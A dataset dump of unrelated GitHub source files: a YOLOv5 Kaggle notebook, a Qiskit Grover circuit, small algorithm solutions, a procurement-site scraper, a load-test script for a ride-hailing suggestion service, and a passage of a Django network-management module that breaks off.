%%\nget_ipython().system('python detect.py --weights {MODEL_PATH} --source {TEST_PATH} --img {IMG_SIZE} --conf 0.281 --iou-thres 0.5 --max-det 3 --save-txt --save-conf')\n\n# %% [markdown]\n# ### How to find the confidence score?\n# \n# 1. First first the [W&B run page](https://wandb.ai/ayush-thakur/kaggle-siim-covid/runs/jbt74n7q) generated by training the YOLOv5 model. \n# \n# 2. Go to the media panel -> click on the F1_curve.png file to get a rough estimate of the threshold -> go to the Bounding Box Debugger panel and interactively adjust the confidence threshold. \n# \n# %% [markdown]\n# > 📍 The bounding box coordinates are saved as text file per image name. It is saved in this directory `runs/detect/exp3/labels`. \n\n# %%\nPRED_PATH = 'runs/detect/exp3/labels'\n\n\n# %%\n# Visualize predicted coordinates.\n\n# %% [markdown]\n# > 📍 Note: 1 is class id (opacity), the first four float numbers are `x_center`, `y_center`, `width` and `height`. The final float value is `confidence`.\n\n# %%\nprediction_files = os.listdir(PRED_PATH)\nprint('Number of test images predicted as opaque: ', len(prediction_files))\n\n# %% [markdown]\n# > 📍 Out of 1263 test images, 583 were predicted with `opacity` label and thus we have that many prediction txt files.\n# %% [markdown]\n# # Submission\n# \n# In this section, I will show how you can use YOLOv5 as object detector and prepare `submission.csv` file.\n\n# %%\n# The submisison requires xmin, ymin, xmax, ymax format. \n# YOLOv5 returns x_center, y_center, width, height\ndef correct_bbox_format(bboxes):\n correct_bboxes = []\n for b in bboxes:\n xc, yc = int(np.round(b[0]*IMG_SIZE)), int(np.round(b[1]*IMG_SIZE))\n w, h = int(np.round(b[2]*IMG_SIZE)), int(np.round(b[3]*IMG_SIZE))\n\n xmin = xc - int(np.round(w/2))\n xmax = xc + int(np.round(w/2))\n ymin = yc - int(np.round(h/2))\n ymax = yc + int(np.round(h/2))\n \n correct_bboxes.append([xmin, xmax, ymin, ymax])\n \n return correct_bboxes\n\n# Read the txt file generated by YOLOv5 during inference and extract \n# confidence and bounding box coordinates.\ndef get_conf_bboxes(file_path):\n confidence = []\n bboxes = []\n with open(file_path, 'r') as file:\n for line in file:\n preds = line.strip('\\n').split(' ')\n preds = list(map(float, preds))\n confidence.append(preds[-1])\n bboxes.append(preds[1:-1])\n return confidence, bboxes\n\n\n# %%\n# Read the submisison file\n# sub_df = pd.read_csv('/kaggle/input/siim-covid19-detection/sample_submission.csv')\nsub_df = pd.read_csv('../input/sample_submission.csv')\nsub_df.tail()\n\n\n# %%\n# Prediction loop for submission\npredictions = []\n\nfor i in tqdm(range(len(sub_df))):\n row = sub_df.loc[i]\n id_name = row.id.split('_')[0]\n id_level = row.id.split('_')[-1]\n \n if id_level == 'study':\n # do study-level classification\n predictions.append(\"Negative 1 0 0 1 1\") # dummy prediction\n \n elif id_level == 'image':\n # we can do image-level classification here.\n # also we can rely on the object detector's classification head.\n # for this example submisison we will use YOLO's classification head. \n # since we already ran the inference we know which test images belong to opacity.\n if f'{id_name}.txt' in prediction_files:\n # opacity label\n confidence, bboxes = get_conf_bboxes(f'{PRED_PATH}/{id_name}.txt')\n bboxes = correct_bbox_format(bboxes)\n pred_string = ''\n for j, conf in enumerate(confidence):\n pred_string += f'opacity {conf} ' + ' '.join(map(str, bboxes[j])) + ' '\n predictions.append(pred_string[:-1]) \n else:\n predictions.append(\"None 1 0 0 1 1\")\n\n\n# %%\nsub_df['PredictionString'] = predictions\n# sub_df.to_csv('submission.csv', index=False)","repo_name":"R1ck29/kaggle-siim-fisabio-rsna-covid-19-detection","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43242190221","text":"import PIL\nimport torch\nimport torchvision.transforms as transforms\n\nimg = PIL.Image.open('MobileFaceNet_Tutorial_Pytorch/images/nagyung1.jpg')\n# img.show()\n\ntf = transforms.ToTensor() # torch tensor로 변환\nimg_t = tf(img)\nprint(img_t.size()) # channel, height, width\n\ntf = transforms.ToPILImage() # Tensor에서 PIL로 변환\nimg_t = tf(img_t)\nprint(img_t) # \n\nimg_t.show()\n\n","repo_name":"nagggyung/TIL-","sub_path":"PIL/PyTorch에서 이미지 열기.py","file_name":"PyTorch에서 이미지 열기.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29225651943","text":"# Tested with python 3.8.12, qiskit 0.34.2, numpy 1.22.2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom qiskit import QuantumCircuit\n\ndef make_grover_circuit(n_qubits):\n\n grover_circuit = QuantumCircuit(n_qubits)\n\n grover_circuit.h(range(n_qubits))\n\n # オラクルを作��して、回路に実装\n oracle = QuantumCircuit(n_qubits)\n\n # N=45のオラクル\n ##################\n ### EDIT BELOW ###\n ##################\n oracle.x(1)\n oracle.x(4)\n oracle.h(n_qubits-1)\n oracle.mct(list(range(n_qubits-1)), n_qubits-1)\n oracle.h(n_qubits-1)\n oracle.x(1)\n oracle.x(4)\n ##################\n ### EDIT ABOVE ###\n ##################\n oracle_gate = oracle.to_gate()\n oracle_gate.name = \"U_w\"\n\n def diffuser(n):\n qc = QuantumCircuit(n)\n\n qc.h(range(n))\n\n ##################\n ### EDIT BELOW ###\n ##################\n qc.rz(2*np.pi, n-1)\n qc.x(list(range(n)))\n\n # multi-controlled Zゲート\n qc.h(n-1)\n qc.mct(list(range(n-1)), n-1)\n qc.h(n-1)\n\n qc.x(list(range(n)))\n ##################\n ### EDIT ABOVE ###\n ##################\n\n qc.h(range(n))\n\n U_s = qc.to_gate()\n U_s.name = \"U_s\"\n return U_s\n\n\n grover_circuit.append(oracle_gate, list(range(n_qubits)))\n grover_circuit.append(diffuser(n_qubits), list(range(n_qubits)))\n grover_circuit.measure_all()\n #grover_circuit.decompose().draw('mpl')\n\n return grover_circuit\n","repo_name":"UTokyo-ICEPP/qc-workbook","sub_path":"source/qc_workbook/grover.py","file_name":"grover.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"66"} +{"seq_id":"40076506616","text":"import re\n\nwith open('./inp/02.txt') as f:\n inp = [line.rstrip() for line in f.readlines()]\n\nvalid = 0\nfor line in inp:\n [one, two, char, pw] = re.match(r'(\\d+)-(\\d+) (\\w): (\\w+)', line).groups()\n positions = pw[int(one) - 1] + pw[int(two) - 1]\n if char in positions and positions[0] != positions[1]:\n valid += 1\n \nprint(valid)\n","repo_name":"Abarn279/advent-of-code-2020","sub_path":"02b.py","file_name":"02b.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24220473924","text":"import asyncio\nimport re\n\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\nfrom django.core.cache import cache\n\n\nfrom .controller import Controller\n\n\nclass Parse:\n __first_url = \"https://zakupki.gov.ru/epz/order/extendedsearch/results.html\"\n __headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'}\n \n \n async def get_page(self, url, page):\n conn = aiohttp.TCPConnector(limit_per_host=1)\n params = [(\"pageNumber\", str(page)),]\n key = f'url{page}'\n html = cache.get(key)\n if not html:\n async with aiohttp.ClientSession(connector=conn,timeout=aiohttp.ClientTimeout(total=60)) as session:\n async with session.get(url, headers=self.__headers, ssl=True, params = params) as response:\n html = await response.text()\n\n cache.add(key, value=html)\n \n return html\n \n \n async def get_soup_object(self, url, page = 1):\n html = await self.get_page(url, page)\n return BeautifulSoup(html, 'lxml')\n \n \n async def get_pagination(self):\n url = self.__first_url\n soup = await self.get_soup_object(url)\n pagination = soup.find(\"div\", {\"class\": \"paginator-block\"}).find(\"div\", {\"class\": \"paginator align-self-center m-0\"}).find_all(\"li\")[-1].text\n return int(pagination)\n \n\n async def parse(self, url, page):\n \n soup = await self.get_soup_object(url, page)\n \n cards = soup.find_all(\"div\", {\"class\": \"row no-gutters registry-entry__form mr-0\"})\n result_array = []\n controller = Controller()\n \n for card in cards: \n number = card.find(\"div\", {\"class\" : \"registry-entry__header-mid__number\"}).find(\"a\").text\n number = re.search(r'[0-9]+', number).group(0)\n try:\n start_price = card.find(\"div\", {\"class\": \"price-block__value\"}).text# перевести в float\n start_price = float(re.match(r'[0-9\\s]+\\,[0-9]+',start_price).group(0).replace(\"\\xa0\", \"\").replace(\",\", \".\"))\n result_array.append((number,start_price))\n except AttributeError:\n start_price = 0\n result_array.append((re.search(r'[0-9]+', number).group(0),0)) \n await controller.create(number, start_price) \n return result_array\n\n async def main(self):\n tasks = []\n pagination = await self.get_pagination()\n for i in range(1, pagination):\n url = \"https://zakupki.gov.ru/epz/order/extendedsearch/results.html\"\n tasks.append(asyncio.create_task(self.parse(url, i)))\n results = await asyncio.gather(*tasks)\n return results\n\n\n","repo_name":"Saitama12-afro1/DjangoParse","sub_path":"DjangoParse/app/pasre.py","file_name":"pasre.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"75157600851","text":"import sys\n\nn = int(sys.stdin.readline().rstrip())\nmaps = []\n\nfor _ in range(n):\n lines = list(map(int, sys.stdin.readline().rstrip().split()))\n maps.append(lines)\n\n# 경우의 수를 보관할 배열\nd = [[0] * n for _ in range(n)]\n\n\ndef solution(n, maps, d):\n d[0][0] = 1\n\n for i in range(n):\n for j in range(n):\n distance = maps[i][j]\n\n # 3. 종료 조건 (0은 더 이상 진행을 막는 종착점이다.)\n if not distance:\n break\n\n # 1. 기준으로부터 아래쪽으로 진행하는 경우\n if 0 <= i + distance < n:\n d[i + distance][j] += d[i][j]\n \n # 2. 기준으로부터 오른쪽으로 진행하는 경우\n if 0 <= j + distance < n:\n d[i][j + distance] += d[i][j]\n\n return d[n - 1][n - 1]\n\n\nprint(solution(n, maps, d))\n","repo_name":"ddu0422/study","sub_path":"algorithm/baekjoon/dp/silver1/1890.py","file_name":"1890.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31070222599","text":"\n# coding: utf-8\n\n# # # PANDA GROUP BY\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\n\n\n# In[4]:\n\n\ndata = {'Company' : ['GOOG','GOOG','MSFT','MSFT','FB','FB'],\n 'PERSON' : ['A','B','C','D','E','F'],\n 'SALES' : [100,200,300,400,500,600]}\n\n\n# In[5]:\n\n\ndf = pd.DataFrame(data)\n\n\n# In[6]:\n\n\ndf\n\n\n# In[9]:\n\n\nbyCompany = df.groupby('Company')\n\n\n# In[10]:\n\n\nbyCompany.mean()\n\n\n# In[11]:\n\n\nbyCompany.sum()\n\n\n# In[12]:\n\n\nbyCompany.std()\n\n\n# In[13]:\n\n\nbyCompany.sum().loc['FB']\n\n\n# In[14]:\n\n\nbyCompany.count()\n\n\n# In[15]:\n\n\nbyCompany.max()\n\n\n# In[16]:\n\n\nbyCompany.min()\n\n\n# In[17]:\n\n\ndf.describe()\n\n\n# In[18]:\n\n\ndf.describe().transpose()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AvinashTiwari/FinacialPhyton","sub_path":"Panda/Panda_Group_By.py","file_name":"Panda_Group_By.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11677095310","text":"from .Assignment import Assignment\n\n# =======================================================================\n# AGDocument class\n# =======================================================================\nclass AGDocument(object):\n def __init__(self):\n self.assignmentName = ''\n self.assignmentID = ''\n self.assignment = Assignment() # the one and only assignment object\n self.htmlReport = ''\n self.dataFiles = [] # a list of input data files needed by the programs under test\n self.testDataFiles = [] # a list of test files.\n","repo_name":"jvolcy/AutoGrader3","sub_path":"AutoGrader3/AGDocument.py","file_name":"AGDocument.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"424615489","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport subprocess\nfrom .code_helper import CodeHelper\n\n\nclass ExtendProcesses:\n _class_file = __file__\n _debug_name = 'ExtendProcesses'\n\n @staticmethod\n def get_exec_path():\n return os.path.dirname(os.path.dirname(ExtendProcesses._class_file))\n\n @staticmethod\n def run(script, script_args=[], errors=''):\n \"\"\" \"\"\"\n if not CodeHelper.check_file(script):\n raise FileExistsError(ExtendProcesses._debug_name + '.run: Try execute undefined script: {}'. format(script))\n cmd_args = []\n cmd_args.append(sys.executable)\n cmd_args.append(script)\n if script_args:\n for ix in script_args:\n cmd_args.append(ix)\n stdin_point = subprocess.PIPE\n stdout_point = subprocess.PIPE\n stderr_point = subprocess.PIPE\n if '' != errors and CodeHelper.check_file(errors):\n stderr_point = open(errors, 'w', encoding='utf8')\n __call_args = {}\n __call_args['stdin'] = stdin_point\n __call_args['stdout'] = stdout_point\n __call_args['stderr'] = stderr_point\n __call_args['cwd'] = ExtendProcesses.get_exec_path()\n __call_args['env'] = {**os.environ, 'PYTHONPATH': os.pathsep.join(sys.path)}\n if not sys.platform.startswith('win'):\n __call_args['encoding'] = 'utf8' # Exception on windows 7 with code/decode in subprocess\n script_call = subprocess.Popen(cmd_args, **__call_args)\n return script_call\n\n @staticmethod\n def update_sys_path():\n sys.path.insert(0, ExtendProcesses.get_exec_path())\n\n @staticmethod\n def stop(_pid):\n _flg = False\n try:\n _pid = int(_pid)\n _real_pid = _pid\n ExtendProcesses.__kill_process(_real_pid)\n _flg = True\n except Exception as ex:\n raise ex\n return _flg\n\n @staticmethod\n def __kill_process(_pid):\n import signal\n os.kill(_pid, signal.SIGTERM)\n pass\n","repo_name":"sp4plm/SPLM","sub_path":"app/utilites/extend_processes.py","file_name":"extend_processes.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"25951548103","text":"#Dojo\n\nnumbers= [-5, 23, 0, -9, 12, 99, 105, -43]\nnumbersLenght = len(numbers)\n\n#Calculating the max\n\nx = 0\nfor i in numbers:\n inum = float(i)\n if inum < x:\n x = inum\nprint (x)\n\n\n#calculating the min\n\nx = 0\nfor i in numbers:\n inum = float(i)\n if inum > x:\n x = inum\nprint (x)\n\n#Calculating the average\n\nnumbersSum= 0\nfor i in range(0, numbersLenght):\n numbersSum += numbers[i]\nprint(f'{numbersSum/numbersLenght}')","repo_name":"alinmuraretu/alin1987","sub_path":"programsmad/mini_max_avg.py","file_name":"mini_max_avg.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37960759751","text":"# https://leetcode-cn.com/problems/reverse-words-in-a-string/\n\n\nclass Solution:\n def reverseWords(self, s: str) -> str:\n s_list = s.strip().split(\" \")\n s_list = list(filter(None, s_list)) # 过滤空字符串\n res = \"\"\n for item in s_list[::-1]:\n res += item\n res += \" \"\n return res.strip()\n\n\nif __name__ == '__main__':\n print(Solution().reverseWords(s=\"a good example\"))","repo_name":"calmisential/My_Leetcode_Solutions","sub_path":"python题解/101~200/0151_翻转字符串里的单词.py","file_name":"0151_翻转字符串里的单词.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33420569752","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nFile with different routines to hold tests on expected_destinations\n\"\"\"\nfrom __future__ import print_function\n\nimport time\n\nfrom nile.api.v1 import clusters\nfrom requests import request\n\n\ncluster = clusters.Hahn()\n\n\ndef query_from_record_v1(record):\n return {\n 'routes_info': [\n [\n obj['source']['full_text'],\n obj['source']['lon'],\n obj['source']['lat'],\n obj['destinations']['full_text'],\n obj['destinations']['lon'],\n obj['destinations']['lat'],\n obj['created'],\n ]\n for obj in record.routes_info\n ],\n 'source': {\n 'point': [\n record.last_route['source']['lon'],\n record.last_route['source']['lat'],\n ],\n 'full_text': record.last_route['source']['full_text'],\n },\n 'time': record.time,\n }\n\n\ndef query_from_record_v2(record):\n return {\n 'history': [\n {\n \"source\": obj['source'],\n \"destination\": (\n obj['destinations'] if obj['destinations']['lon'] else None\n ),\n \"created\": obj['created'],\n }\n for obj in record.routes_info\n ],\n 'source': record.last_route['source'],\n 'time': record.time,\n }\n\n\nversions = {\n \"vladvo_v1\": {\n \"query_from_record\": query_from_record_v1,\n \"target_host\": \"http://vladvo.haze.yandex.net/expected_destinations\",\n },\n \"vladvo_v2\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://vladvo.haze.yandex.net/v2.0/expected_destinations\"),\n },\n \"dev_v1\": {\n \"query_from_record\": query_from_record_v1,\n \"target_host\": \"http://ml.taxi.dev.yandex.net/expected_destinations\",\n },\n \"dev_v2\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://ml.taxi.dev.yandex.net/v2.0/expected_destinations\"),\n },\n \"tst_v1\": {\n \"query_from_record\": query_from_record_v1,\n \"target_host\": \"http://ml.taxi.tst.yandex.net/expected_destinations\",\n },\n \"tst_v2\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://ml.taxi.tst.yandex.net/v2.0/expected_destinations\"),\n },\n \"load_075\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://target075i.load.yandex.net/v2.0/expected_destinations\"),\n \"headers\": {\n \"Host\": \"ml.taxi.dev.yandex.net\",\n },\n },\n}\n\nammos_table_path = '//home/taxi_ml/suggest/golden_set/set_second_half_feb_2018'\n\n\ndef prepare_queries(version, i_from, i_to):\n print(\"Preparing queries for {}\".format(version))\n query_from_record = versions[version][\"query_from_record\"]\n ammos = cluster.read(ammos_table_path)[i_from:i_to]\n print(\"Data loaded from YT\")\n queries_obj = {i + i_from: query_from_record(record)\n for i, record in enumerate(ammos)}\n import json\n json.dump(\n queries_obj, open(\"queries_{}_{}.json\".format(i_from, i_to), mode=\"w\"))\n\n\ndef prepare_ammo(version, i_from, i_to, handler_name):\n print(\"Preparing ammo for {}\".format(version))\n f = open(\"ammo_{}_{}_{}.txt\".format(version, i_from, i_to), mode=\"w\")\n query_from_record = versions[version][\"query_from_record\"]\n ammos = cluster.read(ammos_table_path)[i_from:i_to]\n print(\"Data loaded from YT\")\n print(\"[Host: ml.taxi.dev.yandex.net]\\n\"\n \"[Content-type: application/json]\\n[User-agent: tank]\", file=f)\n import json\n for record in ammos:\n query = query_from_record(record)\n query_string = json.dumps(query)\n print(len(query_string), handler_name, file=f)\n print(query_string, file=f)\n f.close()\n\n\ndef test_mlaas(version, i_from, i_to, return_features=False):\n print(\"Started testing {} from {} to {}\".format(version, i_from, i_to))\n query_from_record = versions[version][\"query_from_record\"]\n target_host = versions[version][\"target_host\"]\n headers = versions[version].get(\"headers\", None)\n print(\"Target host:\", target_host)\n if return_features:\n print(\"Getting features\")\n ammos = cluster.read(ammos_table_path)[i_from:i_to]\n print(\"Data loaded from YT\")\n for i, record in enumerate(ammos):\n real_i = i + i_from\n response_code = -1\n try:\n req_params = {\n \"json\": query_from_record(record),\n }\n if headers:\n req_params[\"headers\"] = headers\n if return_features:\n req_params[\"params\"] = {\"features\": 1}\n for sleep_seconds in [1, 2]:\n response = request(\"post\", target_host, **req_params)\n response_code = response.status_code\n if response_code == 200:\n break\n time.sleep(sleep_seconds)\n if response_code == 200:\n response.json()\n finally:\n print(\"{} : {}\".format(real_i, response_code))\n print(\"Testing finished\")\n\n\ntest_mlaas(\"load_075\", 0, 1000, False)\n\n# prepare_ammo(\"dev_v2\", 0, 100, \"/v2.0/expected_destinations\")\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/GENERAL/test_expected_destinations.py","file_name":"test_expected_destinations.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42210316916","text":"import logging\nimport ipaddress\n\nfrom web_manage.yzy_edu_desktop_mgr.models import *\nfrom web_manage.yzy_user_desktop_mgr.models import *\nfrom web_manage.yzy_resource_mgr.models import *\nfrom web_manage.yzy_user_desktop_mgr import models as personal_model\nfrom web_manage.common.http import server_post\nfrom web_manage.common.log import operation_record, insert_operation_log\nfrom web_manage.common.utils import get_error_result, JSONResponse, is_ip_addr, is_netmask\n\nlogger = logging.getLogger(__name__)\n\n\nclass NetworkManager(object):\n\n def get_object_by_uuid(self, model, uuid):\n try:\n obj = model.objects.filter(deleted=False).get(uuid=uuid)\n return obj\n except Exception as e:\n return None\n\n def get_object_by_name_and_not_uuid(self, model, name, uuid):\n try:\n obj = model.objects.filter(deleted=False).exclude(uuid=uuid).get(name=name)\n return obj\n except Exception as e:\n return None\n\n def check_subnet_params(self, data, subnets=None):\n start_ip = data.get('start_ip')\n end_ip = data.get('end_ip')\n gateway = data.get('gateway')\n netmask = data.get('netmask')\n dns1 = data.get('dns1')\n dns2 = data.get('dns2')\n if not start_ip or not end_ip or not gateway or not netmask or not dns1:\n return get_error_result(\"ParameterError\"), False\n\n for i in [start_ip, end_ip, gateway, dns1, netmask]:\n if not is_ip_addr(i):\n return get_error_result(\"IpAddressGatewayDnsAddressError\"), False\n if dns2 and dns2 != '' and not is_ip_addr(dns2):\n return get_error_result(\"DnsAddressError\"), False\n\n _is_netmask, netmask_bits = is_netmask(netmask)\n if _is_netmask:\n network_num = ipaddress.ip_interface(start_ip + '/' + str(netmask_bits)).network\n if ipaddress.ip_address(end_ip) not in network_num or ipaddress.ip_address(gateway) not in network_num:\n return get_error_result(\"GatewayAndIpError\"), False\n else:\n return get_error_result(\"SubnetMaskError\"), False\n\n if ipaddress.ip_network(start_ip).compare_networks(ipaddress.ip_network(end_ip)) >= 0:\n return get_error_result(\"EndIPLessThanStartIP\"), False\n\n if subnets is not None:\n exit_subnets = []\n for subnet in subnets:\n flag_a = ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n flag_b = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n flag_c = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n flag_d = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['end_ip']))\n flag_e = ipaddress.ip_network(subnet.start_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n flag_f = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.end_ip))\n if (flag_a >= 0 and flag_b >= 0) or (flag_c >= 0 and flag_d >= 0) or (flag_e >= 0 and flag_f >= 0):\n exit_subnets.append(subnet)\n if len(exit_subnets) > 0:\n return get_error_result(\"IpAddressConflictError\"), False\n\n return '', True\n\n\n @operation_record(\"创建数据网络 {data[name]}\")\n def create_network(self, data):\n \"\"\"\n {\n \"name\": \"test_network2\",\n \"switch_uuid\" : \"9c7050ba-5213-11ea-9d93-000c295dd728\",\n \"vlan_id\" : 12,\n \"subnet_info\": {\n \"name\": \"subnet1\",\n \"start_ip\": \"192.168.1.10\",\n \"end_ip\": \"192.168.1.20\",\n \"netmask\": \"255.255.255.0\",\n \"gateway\": \"192.168.1.0\",\n \"dns1\": \"8.8.8.8\"\n }\n }\n :param data:\n :return:\n \"\"\"\n virtual_switch_uuid = data.get(\"switch_uuid\")\n virtual_switch = self.get_object_by_uuid(YzyVirtualSwitchs, virtual_switch_uuid)\n if not virtual_switch:\n logger.error(\"create data-network error: virtual switch [%s] not exist!\"% virtual_switch_uuid)\n ret = get_error_result(\"VSwitchNotExist\")\n return ret\n if data.get('subnet_info'):\n ret, status = self.check_subnet_params(data.get('subnet_info'))\n if not status:\n logger.error(\"create data-network error: check subnet params fail\")\n return ret\n # virtual_start_ip = data.get('subnet_info').get('start_ip')\n # virtual_end_ip = data.get('subnet_info').get('end_ip')\n # gateway = data.get('subnet_info').get('gateway')\n # netmask = data.get('subnet_info').get('netmask')\n # dns1 = data.get('subnet_info').get('dns1')\n # if not virtual_end_ip or not virtual_start_ip or not gateway or not netmask or not dns1:\n # logger.error(\"ParameterError\")\n # return get_error_result(\"ParameterError\")\n # _is_netmask, netmask_bits = is_netmask(netmask)\n # if _is_netmask:\n # network_num = ipaddress.ip_interface(virtual_start_ip + '/' + str(netmask_bits)).network\n # if ipaddress.ip_address(virtual_end_ip) not in network_num or ipaddress.ip_address(gateway) not in network_num:\n # logger.error(\"create data-network error: incorrect gateway\")\n # ret = get_error_result(\"GatewayAndIpError\")\n # return ret\n # if ipaddress.ip_network(virtual_start_ip).compare_networks(ipaddress.ip_network(virtual_end_ip)) >= 0:\n # logger.error(\"create data-network error: virtual start_ip:%s less than virtual! end_ip:%s or input ip in different network segments\"% (virtual_end_ip, virtual_start_ip))\n # ret = get_error_result(\"EndIPLessThanStartIP\")\n # return ret\n # else:\n # logger.error(\"subnet mask error: %s\"% netmask)\n # ret = get_error_result(\"SubnetMaskError\")\n # return ret\n ret = server_post(\"/network/create\", data)\n logger.info(\"create data-network server api return: %s\"% ret)\n return ret\n\n def update_network(self, data, uuid):\n \"\"\"\n 编辑网络\n :param data:\n :return:\n \"\"\"\n new_name = data.get(\"name\", \"\")\n network = self.get_object_by_name_and_not_uuid(YzyNetworks, new_name, uuid)\n if network:\n logger.error(\"update data-network error, the name[%s][%s] not change\"%(network.name, new_name))\n return get_error_result(\"UpdateNoChangeError\", param=new_name)\n data['uuid'] = uuid\n ret = server_post(\"/network/update\", data)\n return ret\n\n def delete_network(self, uuids):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n ret = get_error_result(\"Success\")\n success_num = 0\n failed_num = 0\n try:\n for uuid in uuids:\n obj = self.get_object_by_uuid(YzyNetworks, uuid)\n if obj:\n templates = education_model.YzyInstanceTemplate.objects.filter(deleted=False, network=obj).count()\n if templates > 0:\n failed_num += 1\n continue\n groups = education_model.YzyGroup.objects.filter(deleted=False, network=obj).count()\n if groups > 0:\n failed_num += 1\n continue\n desktops = education_model.YzyDesktop.objects.filter(deleted=False, network=obj).count()\n if desktops > 0:\n failed_num += 1\n continue\n personal_desktops = personal_model.YzyPersonalDesktop.objects.filter(deleted=False, network=obj).count()\n if personal_desktops > 0:\n failed_num += 1\n continue\n ret = server_post(\"/network/delete\", {'uuid': uuid})\n if ret.get(\"code\", -1) != 0:\n failed_num += 1\n else:\n success_num += 1\n else:\n failed_num += 1\n except Exception as e:\n logger.error(\"delete network failed:%s\", e, exc_info=True)\n return get_error_result(\"DataNetworkDeleteFail\")\n \n msg = \"删除数据网络 %s\" % ('/'.join(uuids))\n insert_operation_log(msg, ret[\"msg\"])\n return get_error_result(\"Success\", data={\"failed_num\": failed_num, \"success_num\": success_num})\n\n @operation_record(\"添加计算节点 名称:{data[name]}, IP:{data[ip]}\")\n def add_node(self, data):\n \"\"\"\n data: {\n \"hostname\": \"controller\",\n \"ip\": \"172.16.1.11\",\n \"pool_name\": \"default\",\n \"pool_uuid\": \"ec92a530-4885-11ea-8e15-000c295dd728\",\n \"network_uuid\": \"ec796fde-4885-11ea-8e15-000c295dd728\",\n \"switch_uuid\": \"ec796624-4885-11ea-8e15-000c295dd728\",\n \"interface\": \"ens224\",\n \"manage_interface\": \"ens192\",\n \"image_interface\": \"ens192\"\n }\n :param data:\n :return:\n \"\"\"\n logger.info(\"add node KVM: %s\" % data)\n pool_name = data.get(\"pool_name\")\n pool_uuid = data.get(\"pool_uuid\")\n resource_pool = self.get_object_by_uuid(YzyResourcePools, pool_uuid)\n if not resource_pool:\n logger.error(\"add node KVM, pool_name: %s, pool_uuid: %s\"% (pool_name, pool_uuid))\n return get_error_result(\"ResourcePoolNameExistErr\", name = pool_name)\n switch_uuid = data.get(\"switch_uuid\")\n virtual_switch = self.get_object_by_uuid(YzyVirtualSwitchs, switch_uuid)\n if not virtual_switch:\n logger.error(\"add node KVM, switch_name, switch_uuid: %s\"% switch_uuid)\n return get_error_result(\"VSwitchNotExist\")\n ret = server_post(\"/api/v1/node/check\", data)\n if ret.get('code') != 0:\n logger.info(\"add node KVM failed:%s\", ret['msg'])\n return ret\n logger.info(\"add node KVM success, data: %s\", data)\n return ret\n\n @operation_record(\"编辑计算节点 名称:{data[hostname]}, IP:{data[ip]}, name: {data[name]}\")\n def update_node(self, data):\n \"\"\"\n data {\n \"uuid\": \"xxxxxxxxxxxxxxxx-xxxxxxxxxx\",\n \"hostname\": \"xxxxxx\",\n \"ip\": \"xxxxxxxx\",\n \"name\": \"xxxxxx\"\n }\n :param data:\n :return:\n \"\"\"\n # pass\n uuid = data.get(\"uuid\")\n hostname = data.get(\"hostname\")\n node = self.get_object_by_uuid(YzyNodes, uuid)\n if not node:\n logger.error(\"update node info error, node: %s[%s] not exist\"%(hostname, uuid))\n return get_error_result(\"NodeNotExist\")\n\n name = data.get(\"name\")\n node.name = name\n node.save()\n return get_error_result(\"Success\")\n\n def delete_node(self, data):\n \"\"\"\n data : [\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"}\n ]\n 删除节点\n :return:\n \"\"\"\n names = []\n ret = get_error_result(\"Success\")\n for node in data:\n uuid = node.get(\"uuid\")\n hostname = node.get(\"hostname\")\n names.append(hostname)\n obj = self.get_object_by_uuid(YzyNodes, uuid)\n if obj:\n ret = 